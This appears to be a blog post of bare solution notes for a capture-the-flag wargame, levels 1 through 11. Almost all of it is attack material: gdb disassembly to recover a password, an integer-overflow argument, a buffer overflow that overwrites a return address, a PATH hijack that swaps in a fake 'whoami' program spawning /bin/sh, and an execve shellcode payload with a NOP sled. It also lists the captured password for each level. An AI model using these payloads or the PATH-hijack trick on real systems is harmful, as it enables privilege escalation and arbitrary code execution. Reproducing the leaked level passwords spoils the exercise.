Start:
gdb -q level01set disassembly-flavro intel disass main
0x08048080 <+0>: push 0x8049128 0x08048085 <+5>: call 0x804810f <puts> 0x0804808a <+10>: call 0x804809f <fscanf> 0x0804808f <+15>: cmp eax,0x10f 0x08048094 <+20>: je 0x80480dc <YouWin> 0x0804809a <+26>: call 0x8048103 <exit>Set a breakpoint in 0x0804808a <+10>:
b *(main+10)or:
b *(0x0804808a)
password : 271
cat /home/level2/.pass hgvbmkQIHavkGg5wykLv2
./level02 -2147483648 -1
cat /home/level3/.pass Ib3F7i7FqjziuDOBKi
Lv3:
./level03 $(python -c 'print "A"*76 + "\x74\x84\x04\x08"')
( Ghi de dia chi ham bad bang ham god)
9C4Jxjc3O3IjB7nXej
Lv4:
cd /tmp
mkdir /namnt
vi whoami.c
#include "stdlib.h"
int main(){
system("/bin/sh");
return 0;
}
gcc -o whoami whoami.c
echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
pwd
/tmp/namnt
export PATH=/tmp/namnt:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
cd /level
./level04
cat /home/level5/.pass
KGpWsju2vDpmxcxlvm
Lv6:
Shell:
r $(python -c 'print "\x90"*40+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x50\x50\x89\xe2\x83\xc2\x08\x89\x14\x24\xb0\x0b\x89\xd3\x89\xe1\x31\xd2\xcd\x80\x90\x90\x90"+"\x90"*64+"\xb0\xfb\xff\xbf"')
9BT8fmYDTPimXXhY3m
Lv7:
u1zqhnHEzaKmzK09Um
Lv8:
gQN3plSIDwulXhGQvl
Lv11:
oYZ4UoMIao6oPNhHCo
No comments:
Post a Comment